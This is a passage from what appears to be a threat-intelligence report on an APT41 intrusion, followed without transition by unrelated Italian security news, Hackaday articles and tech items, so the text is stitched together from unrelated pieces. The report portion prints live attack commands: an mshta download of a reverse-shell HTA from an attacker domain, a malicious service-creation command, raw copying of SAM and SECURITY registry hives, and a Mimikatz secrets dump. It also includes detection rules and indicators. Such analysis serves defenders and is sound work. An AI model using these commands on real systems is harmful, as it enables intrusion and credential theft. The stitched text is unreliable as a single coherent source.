When any dynamic library is loaded, the DllEntryPoint function is executed first. In the modified DLL, this function included a check for a debugging environment. Additionally, upon its initial execution, the library verified the language packs installed on the host.. The malicious code would not run if it detected any of the following language packs:
- Japanese (Japan)
- Korean (South Korea)
- Chinese (Mainland China)
- Chinese (Taiwan)
If the system passes the checks, the application that loaded the malicious library executes an exported DLL function containing the malicious code. Because different applications were used to launch the library in different cases, the exported functions vary depending on what the specific software calls. For example, with msedge.dll, the malicious code was implemented in the ShowMessageWithString function, called by cookie_exporter.exe.
The ShowMessageWithString function retrieves its payload from Logs.txt, a file located in the same directory. These filenames are typically hardcoded in the malicious dynamic link libraries we’ve observed.
The screenshot below shows a disassembled code segment responsible for loading the encrypted file. It clearly reveals the path where the application expects to find the file.
The payload is decrypted by repeatedly executing the following instructions using 128-bit SSE registers:
Once the payload is decrypted, the malicious executable code from msedge.dll launches it by using a standard method: it allocates a virtual memory region within its own process, then copies the code there and executes it by creating a new thread. In other versions of similarly distributed Cobalt Strike agents that we examined, the malicious code could also be launched by creating a new process or upon being injected into the memory of another running process.
Beyond the functionality described above, we also found a code segment within the malicious libraries that appeared to be a message to the analyst. These strings are supposed to be displayed if the DLL finds itself running in a debugger, but in practice this doesn’t occur.
Once Cobalt Strike successfully launches, the implant connects to its C2 server. Threat actors then establish persistence on the compromised host by creating a service with a command similar to this:
C:\Windows\system32\cmd.exe /C sc create "server power" binpath= "cmd /c start C:\Windows\tasks\Edge.exe" && sc description "server power" "description" && sc config "server power" start= auto && net start "server power"
Attackers often use the following service names for embedding Cobalt Strike:
server power
WindowsUpdats
7-zip Update
Agent
During our investigation, we uncovered a compromised SharePoint server that the attackers were using as the C2. They distributed files named agents.exe and agentx.exe via the SMB protocol to communicate with the server. Each of these files is actually a C# Trojan whose primary function is to execute commands it receives from a web shell named CommandHandler.aspx, which is installed on the SharePoint server. The attackers uploaded multiple versions of these agents to victim hosts. All versions had similar functionality and used a hardcoded URL to retrieve commands:
The agents executed commands from CommandHandler.aspx using the cmd.exe command shell launched with the /c flag.
While analyzing the agents, we didn’t find significant diversity in their core functionality, despite the attackers constantly modifying the files. Most changes were minor, primarily aimed at evading detection. Outdated file versions were removed from the compromised hosts.
The attackers used the deployed agents to conduct reconnaissance and collect sensitive data, such as browser history, text files, configuration files, and documents with .doc, .docx and .xlsx extensions. They exfiltrated the data back to the SharePoint server via the upload.ashx web shell.
It is worth noting that the attackers made some interesting mistakes while implementing the mechanism for communicating with the SharePoint server. Specifically, if the CommandHandler.aspx web shell on the server was unavailable, the agent would attempt to execute the web page’s error message as a command:
Obtaining a command shell: reverse shell via an HTA file
If, after their initial reconnaissance, the attackers deemed an infected host valuable for further operations, they’d try to establish an alternative command-shell access. To do this, they executed the following command to download from an external resource a malicious HTA file containing an embedded JavaScript script and run this file:
"cmd.exe" /c mshta hxxp[:]//github.githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
The group attempted to mask their malicious activity by using resources that mimicked legitimate ones to download the HTA file. Specifically, the command above reached out to the GitHub-impersonating domain github[.]githubassets[.]net. The attackers primarily used the site to host JavaScript code. These scripts were responsible for delivering either the next stage of their malware or the tools needed to further the attack.
At the time of our investigation, a harmless script was being downloaded from github[.]githubassets[.]net instead of a malicious one. This was likely done to hide the activity and complicate attack analysis.
The harmless script found on github[.]githubassets[.]net
![The harmless script found on github[.]githubassets[.]net](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2025/07/21032431/apt41-in-africa17.png "The harmless script found on github[.]githubassets[.]net")
However, we were able to obtain and analyze previously distributed scripts, specifically the malicious file 2CD15977B72D5D74FADEDFDE2CE8934F. Its primary purpose is to create a reverse shell on the host, giving the attackers a shell for executing their commands.
Once launched, the script gathers initial host information:
It then connects to the C2 server, also located at github[.]githubassets[.]net, and transmits a unique ATTACK_ID along with the initially collected data. The script leverages various connection methods, such as WebSockets, AJAX, and Flash. The choice depends on the capabilities available in the browser or execution environment.
Data collection
Next, the attackers utilized automation tools such as stealers and credential-harvesting utilities to collect sensitive data. We detail these tools below. Data gathered by these utilities was also exfiltrated via the compromised SharePoint server. In addition to the aforementioned web shell, the SMB protocol was used to upload data to the server. The files were transferred to a network share on the SharePoint server.
Pillager
A modified version of the Pillager utility stands out among the tools the attackers deployed on hosts to gather sensitive information. This tool is used to export and decrypt data from the target computer. The original Pillager version is publicly available in a repository, accompanied by a description in Chinese.
The primary types of data collected by this utility include:
- Saved credentials from browsers, databases, and administrative utilities like MobaXterm
- Project source code
- Screenshots
- Active chat sessions and data
- Email messages
- Active SSH and FTP sessions
- A list of software installed on the host
- Output of the systeminfo and tasklist commands
- Credentials stored and used by the operating system, and Wi-Fi network credentials
- Account information from chat apps, email clients, and other software
A sample of data collected by Pillager:
The utility is typically an executable (EXE) file. However, the attackers rewrote the stealer’s code and compiled it into a DLL named wmicodegen.dll. This code then runs on the host via DLL sideloading. They chose convert-moftoprovider.exe, an executable from the Microsoft SDK toolkit, as their victim application. It is normally used for generating code from Managed Object Format (MOF) files.
Despite modifying the code, the group didn’t change the stealer’s default output file name and path: C:\Windows\Temp\Pillager.zip.
It’s worth noting that the malicious library they used was based on the legitimate SimpleHD.dll HDR rendering library from the Xbox Development Kit. The source code for this library is available on GitHub. This code was modified so that convert-moftoprovider.exe loaded an exported function, which implemented the Pillager code.
Interestingly, the path to the PDB file, while appearing legitimate, differs by using PS5 instead of XBOX:
Checkout
The second stealer the attackers employed was Checkout. In addition to saved credentials and browser history, it also steals information about downloaded files and credit card data saved in the browser.
When launching the stealer, the attackers pass it a j8 parameter; without it, the stealer won’t run. The malware collects data into CSV files, which it then archives and saves as CheckOutData.zip in a specially created directory named CheckOut.
Data collection and archiving in Checkout
Checkout launch diagram in Kaspersky Threat Intelligence Platform
RawCopy
Beyond standard methods for gathering registry dumps, such as using reg.exe, the attackers leveraged the publicly available utility RawCopy (MD5 hash: 0x15D52149536526CE75302897EAF74694) to copy raw registry files.
RawCopy is a command-line application that copies files from NTFS volumes using a low-level disk reading method.
The following commands were used to collect registry files:
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\system /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\sam /OutputPath:c:\users\public\downloads
c:\users\public\downloads\RawCopy.exe /FileNamePath:C:\Windows\System32\Config\security /OutputPath:c:\users\public\downloads
Mimikatz
The attackers also used Mimikatz to dump account credentials. Like the Pillager stealer, Mimikatz was rewritten and compiled into a DLL. This DLL was then loaded by the legitimate java.exe file (used for compiling Java code) via DLL sideloading. The following files were involved in launching Mimikatz:
C:\Windows\Temp\123.bat
C:\Windows\Temp\jli.dll
C:\Windows\Temp\java.exe
С:\Windows\Temp\config.ini
123.bat is a BAT script containing commands to launch the legitimate java.exe executable, which in turn loads the dynamic link library for DLL sideloading. This DLL then decrypts and executes the Mimikatz configuration file, config.ini, which is distributed from a previously compromised host within the infrastructure.
java.exe privilege::debug token::elevate lsadump::secrets exit
Retrospective threat hunting
As already mentioned, the victim organization’s monitoring coverage was initially patchy. Because of this, in the early stages, we only saw the external IP address of the initial source and couldn’t detect what was happening on that host. After some time, the host was finally connected to our monitoring systems, and we found that it was an IIS web server. Furthermore, despite the lost time, it still contained artifacts of the attack.
These included the aforementioned Cobalt Strike implant located in c:\programdata\, along with a scheduler task for establishing persistence on the system. Additionally, a web shell remained on the host, which our solutions detected as HEUR:Backdoor.MSIL.WebShell.gen. This was found in the standard temporary directory for compiled ASP.NET application files:
c:\windows\microsoft.net\framework64\v4.0.30319\temporary asp.net files\root\dedc22b8\49ac6571\app_web_hdmuushc.dll
MD5: 0x70ECD788D47076C710BF19EA90AB000D
These temporary files are automatically generated and contain the ASPX page code:
The web shell was named newfile.aspx. The screenshot above shows its function names. Based on these names, we were able to determine that this instance utilized a Neo-reGeorg web shell tunnel.
This tool is used to proxy traffic from an external network to an internal one via an externally accessible web server. Thus, the launch of the Impacket tools, which we initially believed was originating from a host unidentified at the time (the IIS server), was in fact coming from the external network through this tunnel.
Attribution
We attribute this attack to APT41 with a high degree of confidence, based on the similarities in the TTPs, tooling, and C2 infrastructure with other APT41 campaigns. In particular:
- The attackers used a number of tools characteristic of APT41, such as Impacket, WMI, and Cobalt Strike.
- The attackers employed DLL sideloading techniques.
- During the attack, various files were saved to C:\Windows\Temp.
- The C2 domain names identified in this incident (s3-azure.com, *.ns1.s3-azure.com, *.ns2.s3-azure.com) are similar to domain names previously observed in APT41 attacks (us2[.]s3bucket-azure[.]online, status[.]s3cloud-azure[.]com).
Takeaways and lessons learned
The attackers wield a wide array of both custom-built and publicly available tools. Specifically, they use penetration testing tools like Cobalt Strike at various stages of an attack. The attackers are quick to adapt to their target’s infrastructure, updating their malicious tools to account for specific characteristics. They can even leverage internal services for C2 communication and data exfiltration. The files discovered during the investigation indicate that the malicious actor modifies its techniques during an attack to conceal its activities – for example, by rewriting executables and compiling them as DLLs for DLL sideloading.
While this story ended relatively well – we ultimately managed to evict the attackers from the target organization’s systems – it’s impossible to counter such sophisticated attacks without a comprehensive knowledge base and continuous monitoring of the entire infrastructure. For example, in the incident at hand, some assets weren’t connected to monitoring systems, which prevented us from seeing the full picture immediately. It’s also crucial to maintain maximum coverage of your infrastructure with security tools that can automatically block malicious activity in the initial stages. Finally, we strongly advise against granting excessive privileges to accounts, and especially against using such accounts on all hosts across the infrastructure.
Appendix
Rules
Yara
rule neoregeorg_aspx_web_shell
{
meta:
description = "Rule to detect neo-regeorg based ASPX web-shells"
author = "Kaspersky"
copyright = "Kaspersky"
distribution = "DISTRIBUTION IS FORBIDDEN. DO NOT UPLOAD TO ANY MULTISCANNER OR SHARE ON ANY THREAT INTEL PLATFORM"
strings:
$func1 = "FrameworkInitialize" fullword
$func2 = "GetTypeHashCode" fullword
$func3 = "ProcessRequest" fullword
$func4 = "__BuildControlTree"
$func5 = "__Render__control1"
$str1 = "FAIL" nocase wide
$str2 = "Port close" nocase wide
$str3 = "Port filtered" nocase wide
$str4 = "DISCONNECT" nocase wide
$str5 = "FORWARD" nocase wide
condition:
uint16(0) == 0x5A4D and
filesize < 400000 and
3 of ($func*) and
3 of ($str*)
}
Sigma
title: Service Image Path Start From CMD
id: faf1e809-0067-4c6f-9bef-2471bd6d6278
status: test
description: Detects creation of unusual service executable starting from cmd /c using command line
references:
- tbd
tags:
- attack.persistence
- attack.T1543.003
author: Kaspersky
date: 2025/05/15
logsource:
product: windows
service: security
detection:
selection:
EventID: 4697
ServiceFileName|contains:
- '%COMSPEC%'
- 'cmd'
- 'cmd.exe'
ServiceFileName|contains|all:
- '/c'
- 'start'
condition: selection
falsepositives:
- Legitimate
level: medium
IOCs
Files
2F9D2D8C4F2C50CC4D2E156B9985E7CA
9B4F0F94133650B19474AF6B5709E773
A052536E671C513221F788DE2E62316C
91D10C25497CADB7249D47AE8EC94766
C3ED337E2891736DB6334A5F1D37DC0F
9B00B6F93B70F09D8B35FA9A22B3CBA1
15097A32B515D10AD6D793D2D820F2A8
A236DCE873845BA4D3CCD8D5A4E1AEFD
740D6EB97329944D82317849F9BBD633
C7188C39B5C53ECBD3AEC77A856DDF0C
3AF014DB9BE1A04E8B312B55D4479F69
4708A2AE3A5F008C87E68ED04A081F18
125B257520D16D759B112399C3CD1466
C149252A0A3B1F5724FD76F704A1E0AF
3021C9BCA4EF3AA672461ECADC4718E6
F1025FCAD036AAD8BF124DF8C9650BBC
100B463EFF8295BA617D3AD6DF5325C6
2CD15977B72D5D74FADEDFDE2CE8934F
9D53A0336ACFB9E4DF11162CCF7383A0
27F506B198E7F5530C649B6E4860C958
Domains and IPs
47.238.184[.]9
38.175.195[.]13
hxxp://github[.]githubassets[.]net/okaqbfk867hmx2tvqxhc8zyq9fy694gf/hta
hxxp://chyedweeyaxkavyccenwjvqrsgvyj0o1y.oast[.]fun/aaa
hxxp://toun[.]callback.red/aaa
hxxp://asd.xkx3[.]callback.[]red
hxxp[:]//ap-northeast-1.s3-azure[.]com
hxxps[:]//www[.]msn-microsoft[.]org:2053
hxxp[:]//www.upload-microsoft[.]com
s3-azure.com
*.ns1.s3-azure.com
*.ns2.s3-azure.com
upload-microsoft[.]com
msn-microsoft[.]org
MITRE ATT&CK
| Tactic | Technique | ID |
| Initial Access | Valid Accounts: Domain Accounts | T1078.002 |
| Exploit Public-Facing Application | T1190 | |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 |
| Command and Scripting Interpreter: Windows Command Shell | T1059.003 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Windows Management Instrumentation | T1047 | |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 |
| Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Valid Accounts: Domain Accounts | T1078.002 | |
| Web Shell | T1505.003 | |
| IIS Components | T1505.004 | |
| Privilege Escalation | Create or Modify System Process: Windows Service | T1543.003 |
| Hijack Execution Flow: DLL Side-Loading | T1574.002 | |
| Process Injection | T1055 | |
| Scheduled Task/Job: Scheduled Task | T1053.005 | |
| Valid Accounts: Domain Accounts | T1078.002 | |
| Defense Evasion | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
| Deobfuscate/Decode Files or Information | T1140 | |
| Indicator Removal: File Deletion | T1070.004 | |
| Masquerading | T1036 | |
| Process Injection | T1055 | |
| Credential Access | Credentials from Password Stores: Credentials from Web Browsers | T1555.003 |
| OS Credential Dumping: Security Account Manager | T1003.002 | |
| Unsecured Credentials | T1552 | |
| Discovery | Network Service Discovery | T1046 |
| Process Discovery | T1057 | |
| System Information Discovery | T1082 | |
| System Network Configuration Discovery | T1016 | |
| Lateral movement | Lateral Tool Transfer | T1570 |
| Remote Services: SMB/Windows Admin Shares | T1021.002 | |
| Collection | Archive Collected Data: Archive via Utility | T1560.001 |
| Automated Collection | T1119 | |
| Data from Local System | T1005 | |
| Command and Control | Application Layer Protocol: Web Protocols | T1071.001 |
| Application Layer Protocol: DNS | T1071.004 | |
| Ingress Tool Transfer | T1105 | |
| Proxy: Internal Proxy | T1090.001 | |
| Protocol Tunneling | T1572 | |
| Exfiltration | Exfiltration Over Alternative Protocol | T1048 |
| Exfiltration Over Web Service | T1567 |
ToolShell: la nuova minaccia che colpisce i server Microsoft SharePoint
Una campagna di attacchi informatici avanzati è stata individuata che prende di mira i server Microsoft SharePoint. Questa minaccia si avvale di una serie di vulnerabilità, conosciuta come “ToolShell“, che permette agli aggressori di acquisire il controllo completo e remoto dei sistemi, bypassando l’autenticazione.
Eye Security, un’azienda olandese di sicurezza informatica, ha identificato lo sfruttamento attivo il 18 luglio 2025, rivelando quella che i ricercatori di sicurezza descrivono come una delle transizioni più rapide dalla prova di concetto allo sfruttamento di massa nella storia recente.
La catena di vulnerabilità combina due falle di sicurezza critiche, cybersecuritynews.com/microsof…CVE-2025-49706 e cybersecuritynews.com/microsof…CVE-2025-49704 , originariamente dimostrate al Pwn2Own Berlin 2025 a maggio dai ricercatori di sicurezza di CODE WHITE GmbH, un’azienda tedesca di sicurezza offensiva.
L’exploit è rimasto inattivo fino al 15 luglio 2025, quando CODE WHITE ha condiviso pubblicamente i risultati dettagliati delle sue ricerche sulle piattaforme dei social media dopo il rilascio ufficiale della patch da parte di Microsoft. Nel giro di sole 72 ore dalla divulgazione al pubblico, gli autori della minaccia avevano reso operativo con successo l’exploit per attacchi coordinati su larga scala.
L’indagine approfondita di Eye Security ha rivelato che gli aggressori hanno iniziato uno sfruttamento sistematico di massa il 18 luglio 2025, intorno alle 18:00 ora dell’Europa centrale, utilizzando inizialmente l’indirizzo IP 107.191.58.76. Una seconda distinta ondata di attacchi è emersa da 104.238.159.149 il 19 luglio 2025 alle 07:28 CET, indicando chiaramente una campagna internazionale ben coordinata.
L’exploit di ToolShell aggira i meccanismi di autenticazione tradizionali prendendo di mira /_layouts/15/ToolPane.aspx l’endpoint vulnerabile di SharePoint. A differenza delle web shell convenzionali progettate principalmente per l’esecuzione di comandi, il payload dannoso estrae specificatamente chiavi crittografiche sensibili dai server di SharePoint, tra cui i materiali critici ValidationKey e DecryptionKey.
“Non si trattava della tipica webshell”, hanno spiegato i ricercatori di Eye Security nella loro dettagliata analisi tecnica. “L’attaccante trasforma la fiducia intrinseca di SharePoint nella propria configurazione in un’arma potente”. Una volta ottenuti con successo questi segreti crittografici, gli aggressori possono creare un payload __VIEWSTATE completamente validi per ottenere l’esecuzione completa del codice remoto, senza richiedere alcuna credenziale utente.
L’attacco sofisticato sfrutta tecniche simili al CVE-2021-28474, sfruttando i processi di deserializzazione e controllo del rendering di SharePoint. Ottenendo la ValidationKey del server, gli aggressori possono firmare digitalmente payload dannosi che SharePoint accetta automaticamente come input legittimo e attendibile, aggirando di fatto tutti i controlli di sicurezza e le misure difensive esistenti.
La scansione completa di oltre 1.000 server SharePoint distribuiti in tutto il mondo effettuata da Eye Security ha evidenziato decine di sistemi attivamente compromessi in numerose organizzazioni. L’azienda di sicurezza informatica ha immediatamente avviato procedure di divulgazione responsabile, contattando direttamente tutte le organizzazioni interessate e i Computer Emergency Response Team (CERT) nazionali in tutta Europa e a livello internazionale.
L'articolo ToolShell: la nuova minaccia che colpisce i server Microsoft SharePoint proviene da il blog della sicurezza informatica.
Researching Glow-Powder Left a few Scars
Content warning: Human alteration and scalpels.
General warning: We are not speaking as doctors. Or lawyers.
If you watch sci-fi, you probably do not have to think hard to conjure a scene in a trendy bar where the patrons have glowing make-up or tattoos. That bit of futuristic flair was possible years ago with UV-reactive tattoo ink, but it has the unfortunate tendency to permanently fade faster than traditional ink. [Miana], a biohacker, wanted something that could last forever and glow on its own. After months of research and testing, she presents a technique with a silica-coated powder and scarification. Reddit post with graphic content.
The manufacturer does not sell the powder for internal use, so it requires sterilization in an autoclave, which should tell you why this is a hack and not just repurposing. The experimentation includes various scarification techniques and different bandaging approaches, but this is still a small group, and the oldest is measured in months, not years, as of the time of writing.
We think these look amazing, but there are significant caveats. If you have never done scarification, spoiler, it hurts! If the flesh cutting is not bad enough, someone gets to rub sand into the open cuts. You may find yourself carrying a UV flashlight everywhere to charge it up. [Miana] was kind enough to provide the link to the powder she uses, but this link is provided solely so our readers can investigate the ingredients.
If you are more interested in the glowing aspect than the biohacking part, be sure to read about making strontium aluminate. If you want to get into the weeds, you can make a phosphorescence detector and quantify how glow-y something is.
IO E CHATGPT E08: Imparare una nuova lingua
In questo episodio analizziamo la possibilità di utilizzare strumenti di intelligenza artificiale generativa per imparare una nuova lingua.
zerodays.podbean.com/e/io-e-ch…
Remembering Chiptunes, the Demoscene and the Illegal Music of Keygens
We loved keygens back in the day. Our lawyers advise us to clarify that it’s because of the demo-scene style music embedded in them, not because we used them for piracy. [Patch] must feel the same way, as he has a lovely historical retrospective out on “The Internet’s Most Illegal Music” (embedded below).
After defining what he’s talking about for the younger set, who may never have seen a keygen in this degenerate era of software-by-subscription, traces the history of the jaunty chiptunes that were so often embedded in this genre of program. He starts with the early demoscene and its relationship with cracker groups — those are coders who circulate “cracked” versions of games, with the copyright protection removed. In the old days, they’d embed an extra loading screen to take credit for the dastardly deeds that our lawyer says to disavow.
more after the break…
Because often the same people creating the amazing audio-video demos of the “demoscene” were involved in cracking, those loading screens could sometimes outshine the games themselves. (We saw it at a friend’s house one time.) There was almost always excellent music provided by the crackers, and given the limitations of the hardware of the era, it was what we’d know of today as a “chiptune”.
The association between crackers and chiptunes lasted long after the chips themselves had faded into obsolescence. Part of the longevity of the tracker-built tunes is that in the days of dial-up you’d much rather a keygen with a .MOD file embedded than an .mP3, or god forbid, an uncompressed .WAV that would take all day to download.
Nowadays, chiptunes are alive and well, and while they try and hearken back more to the demoscene than the less savory side of their history, the connection to peg-legged programmers is a story that deserves to be told. The best part of the video is the link to keygenmusic.tk/ where you can finally find out who was behind that bopping track that’s been stuck in your head intermittently since 1998. (When you heard it at a computer lab, not on your own machine, of course.)
The demoscene continues to push old machines to new heights, and its spirit lives on in hacking machines like the RP2040.
youtube.com/embed/zHgcrdv8zpM?…
Hackaday Links: July 20, 2025
In the relatively short time that the James Webb Space Telescope has been operational, there’s seemingly no end to its list of accomplishments. And if you’re like us, you were sure that Webb had already achieved the first direct imaging of a planet orbiting a star other than our own a long time ago. But as it turns out, Webb has only recently knocked that item off its bucket list, with the direct visualization of a Saturn-like planet orbiting a nearby star known somewhat antiseptically as TWA 7, about 111 light-years away in the constellation Antlia. The star has a significant disk of debris orbiting around it, and using the coronagraph on Webb’s MIRI instrument, astronomers were able to blot out the glare of the star and collect data from just the dust. This revealed a faint infrared source near the star that appeared to be clearing a path through the dust.
The planet, dubbed TWA 7b, orbits its star at about 50 times the distance from Earth to the Sun and is approximately the size of Saturn, but only a third of its mass. The star itself is only about 6.4 million years old, so the planet may still be accreting from the debris disk, which might present interesting insights into planetary formation, assuming that other astronomers confirm that TWA 7b is indeed a planet. But what’s really interesting about this discovery is that because the star system’s orbital plane appears to be more or less perpendicular to ours, the standard exoplanet detection method based on measuring the dimming of the star by planets passing between it and us wouldn’t have worked. This might open the doors to the discovery of many more exoplanets, and that’s pretty exciting.
Question: What’s worse than a big space rock that’s on a collision course with Earth? Answer: Honestly, it feels like a lot of things would be worse than that right now. But if your goal is planetary protection, one possible answer is doing something that turns the one big rock into a lot of little rocks. That seems to be just what NASA’s DART mission did when it smashed into a bit of space debris named Dimorphos back in 2022, ejecting over 100 boulders from the asteroid-orbiting moonlet. LICIAcube, an Italian cubesat that hitched a ride on DART, used optical cameras to observe the ejecta, and measured rocks from 0.2 m to 3.6 m in diameter as they yeeted off at up to 52 meters per second. Rather than spreading out randomly, the boulders clustered into two different groups, something that years of playing Asteroids has taught us isn’t what you’d expect. The whole thing just goes to show that planetary protection isn’t as simple as blasting into a killer asteroid and hoping for the best. And please, can somebody out there type “NASA DART” into Google and tell me what they see? Because if it’s not an animated spacecraft zipping across the screen and knocking the window out of kilter, then I need a vacation. K, thanks.
Do you even code? If you’re reading Hackaday, chances are good that you at least know enough coding to get yourself into trouble. But if you don’t, or you want to ruin somebody else’s life bring someone new into the wonderful world of bossing computers around, take a look at Micro Adventure, an online adventure game aimed at teaching you the basics — err, BASICs — of coding. The game walks you through a text-based RPG (“You’re in a dark room…”) and prompts you to code your way through to a solution. The game has an emulator window that appears to be based on MS/DOS 1.00, so you know it’s cutting-edge stuff. To be fair, it’s always been our experience that coding is mostly about concepts, and once you learn what a loop is or how to branch in one language, figuring it out in another language is just about syntax. There seem to be at least six different adventures planned, so perhaps other languages will make an appearance in the future.
And finally, while we’re talking about the gamification of nerd education, if you’ve been meaning to learn Morse code, you might want to check out Morse Code Defender. It’s an Android app that uses a Missile Command motif to help you learn Morse, with attacking missiles having a character attached to them, and you having to enter the correct Morse code to blow the missile up before it takes out your ham shack. We haven’t tried it yet, so there may be more to it, but it sure seems like a cute way to gamify the Morse learning process. Honestly, it’s got to be better than doomscrolling Instagram.
Designing an Open Source Multimeter: the HydraMeter
Our hacker [John Duffy] wrote in to let us know about a video he put together to explain the design of his open-source multimeter, the HydraMeter.
If you’re interested in how the circuitry for a voltmeter, ohmmeter, or ammeter might work, this video is a masterclass. In this long and detailed video, [John] walks us through his solutions to various challenges he had while designing his own multimeter. We covered this multimeter last year, and this new video elaborates on the design of the HydraMeter which has been a work in progress for years now.
The basic design feeds voltage, current, and resistance front-ends into an Analog to Digital Converter (ADC), which then feeds into a microcontroller and out to the (detachable) display. You can find the KiCad design files on the GitHub page. There is also a write-up on hackaday.io.
The user interface for the meter is… opinionated, and perhaps not to everyone’s taste. In the video, [John] talks a little bit about why he made the UI work the way that it does, and he noted that adding a rotary range switch is a goal for version 2.0.
The case is 3D printed and [John] had glowing things to say about his Bambu printer. He also had glowing things to say about D-sub connectors, but he did not have glowing things to say about Solid Edge, the CAD software he used to design the case.
Thank you, [John], for putting this video together; it is an excellent resource. We look forward to seeing version 2.0 develop soon!
youtube.com/embed/WZxFVFWPRwQ?…
When a Record Player Doesn’t Work Due to Solid State Grease
Normally, mechanical devices like record players move smoothly, with well-greased contact surfaces enabling the tone arm to automatically move, the multi-record mechanism to drop down a fresh disc, and the listener to have a generally good time. Unfortunately, the 1972-era ITT KP821 record player that [Mark] got recently handed by a friend wasn’t doing a lot of moving, with every part of the mechanism seemingly frozen in place, though the current owner wasn’t certain that they were doing something wrong.
More after the break…
Fortunately, this record player was in exceptionally good condition.. The primary failure was that the BSR record player mechanism, with its many touching metal surfaces, was suffering from a bad case of solidified grease. Although this is easily fixed with some IPA and a lot of elbow grease, the biggest trick with these mechanisms is putting it back together after cleaning, with many seemingly randomly shaped parts and every single E-clip that the manufacturer could design for and source at the time.
With that complete, this just left some pot cleaning and replacing a busted fuse in the amplifier section. The selenium rectifier was still functional, as were the SGS TAA621AX1 audio amplifier ICs. Despite the age of this ‘portable’ record player, both its BSR mechanism and the twin speakers that are part of the record player are in remarkably good condition. Much like with a car, it seems that you just have to swap out the liquid-y elements before they turn into a solid.
youtube.com/embed/bVNJbGhCQEA?…
Mercedes-Benz e Microsoft insieme per l’integrazione di Teams e Copilot 365 nelle auto da questa estate
Il 16 luglio, Mercedes-Benz ha annunciato con un comunicato stampa l’ampliamento della collaborazione con Microsoft, introducendo le più recenti soluzioni Office e strumenti di collaborazione, inclusa una versione aggiornata dell’app Meetings for Teams. Questa nuova funzionalità consente di partecipare a videoconferenze direttamente dall’auto, sfruttando la videocamera di bordo, anche durante la guida.
Mercedes-Benz è inoltre diventata la prima casa automobilistica a integrare nativamente Microsoft Intune nel sistema operativo di bordo MB.OS, estendendo così le possibilità di lavoro da remoto direttamente in auto. Le due aziende hanno confermato anche il piano per l’integrazione di Microsoft 365 Copilot, l’assistente basato su intelligenza artificiale generativa, che renderà più efficiente la preparazione e la gestione delle riunioni.
Secondo quanto comunicato, queste nuove funzionalità debutteranno questa estate sulla nuova Mercedes-Benz CLA equipaggiata con il sistema MBUX di quarta generazione e MB.OS.
Grazie alla nuova app Meetings for Teams, i conducenti potranno partecipare a videoconferenze utilizzando la videocamera integrata del veicolo. Per garantire la sicurezza, il sistema rispetta le normative locali: durante la guida, lo schermo per la videoconferenza viene disattivato automaticamente, impedendo al conducente di visualizzare contenuti condivisi o presentazioni. La videocamera può essere disattivata in qualsiasi momento. L’app è stata inoltre ottimizzata per l’uso aziendale, offrendo una nuova interfaccia con l’anteprima della “riunione successiva”, accesso rapido ai contatti più utilizzati, chat migliorata e la possibilità di inserire testo tramite comandi vocali. È anche possibile passare dal calendario alla riunione di Teams con un solo tocco, per una transizione rapida e intuitiva.
Infine, il comunicato evidenzia lo sviluppo dell’integrazione di Microsoft 365 Copilot come uno dei primi assistenti collaborativi basati su intelligenza artificiale progettati per il mondo automotive. Gli utenti potranno sfruttare comandi vocali per sintetizzare rapidamente le email, ottenere informazioni sui clienti e organizzare appuntamenti, consentendo una gestione delle attività quotidiane più efficiente e sicura, senza distrazioni alla guida.
L'articolo Mercedes-Benz e Microsoft insieme per l’integrazione di Teams e Copilot 365 nelle auto da questa estate proviene da il blog della sicurezza informatica.
8 Bit Mechanical Computer Built from Knex
Long before electricity was a common household utility, humanity had been building machines to do many tasks that we’d now just strap a motor or set of batteries onto and think nothing of it. Transportation, manufacturing, agriculture, and essentially everything had non-electric analogs, and perhaps surprisingly, there were mechanical computers as well. Electronics-based computers are far superior in essentially every way, but the aesthetics of a mechanical computer are still unmatched, like this 8-bit machine built from K’nex.
More after the break…
The K’nex computer is built by [Shadowman39], and this first video features just the ALU. It can accept numbers from 0-255 or -128 to 127 and can add two of these numbers by storing them in registers using levers to represent each digit. A drive system underneath with a rack and pinion system operates on each digit, eventually outputting the sum. It can also perform other mathematical operations like subtraction and handling negative numbers using the two’s complement method.
Although this video only goes over the ALU for the mechanical computer, we look forward to [Shadowman39]’s future videos, which go over the other parts of the machine. The basics of the computer are shown in intricate detail. Mechanical computers like these, while generally built as passion projects and not as usable computers, are excellent ways to get a deeper understanding of their electronics-based cousins. Another way to dive deep into this sort of computing world is by building a relay computer.
youtube.com/embed/EtIJUwkOAwM?…
Engine Data Displayed Live On Dash
In the auto world, there are lots of overarching standards that all automakers comply with. There are also lots of proprietary technologies that each automaker creates and uses for its own benefit. [Shehriyar Qureshi] has recently been diving into Suzuki’s Serial Data Line standard, and has created a digital dash using the data gained.
The project started with Python-based scanner code designed to decode Suzuki’s SDL protocol. Armed with the ability to read the protocol, [Shehriyar] wanted to be able to do so without having to haul a laptop around in the car. Thus, the project was ported to Rust, or “oxidized” if you will.
More after the break…
[Shehriyar] has installed the system in a Suzuki Baleno. The Raspberry Pi uses a VAG KKL interface to connect to the car via its OBD port and connect to the SDL line. It decodes this data, and processes it to pull out parameters like speed, RPM. It then drives an LCD display on the double-DIN stereo in the dash. A simple composite output allows the system to display live data while driving the vehicle. The UI uses the Ratatui library. The result is a display that both updates smoothly and rapidly. It has a great retro vibe that kind of reminds us of some interfaces seen in Hollywood movies. Despite being analog video, the results are pretty sharp.
We’ve seen a few great digital dashboards over the years.
Crazy news: Ratatui made it into a car dashboardsuzui-rs — Suzuki Serial Data Line viewer in Rust
Displays live car data, powered by Pi and shown on stereo over RCA
Written in Rust & built with @ratatui.rs
GitHub: github.com/thatdevsherr…#rustlang #ratatui #tui #car #suzuki
Robot umanoide cinese sostituisce la propria batteria e lavora 24 ore al giorno
La presentazione del Walker S2 rappresenta un importante passo avanti nell’autonomia operativa dei robot umanoidi. Grazie alla capacità di sostituire autonomamente la propria batteria, il robot può garantire un funzionamento continuativo, superando uno dei limiti più rilevanti nell’impiego dei robot in ambienti industriali e di servizio: la necessità di frequenti interventi manuali per la ricarica. Questa innovazione apre nuove prospettive per l’automazione di processi complessi che richiedono operatività costante.
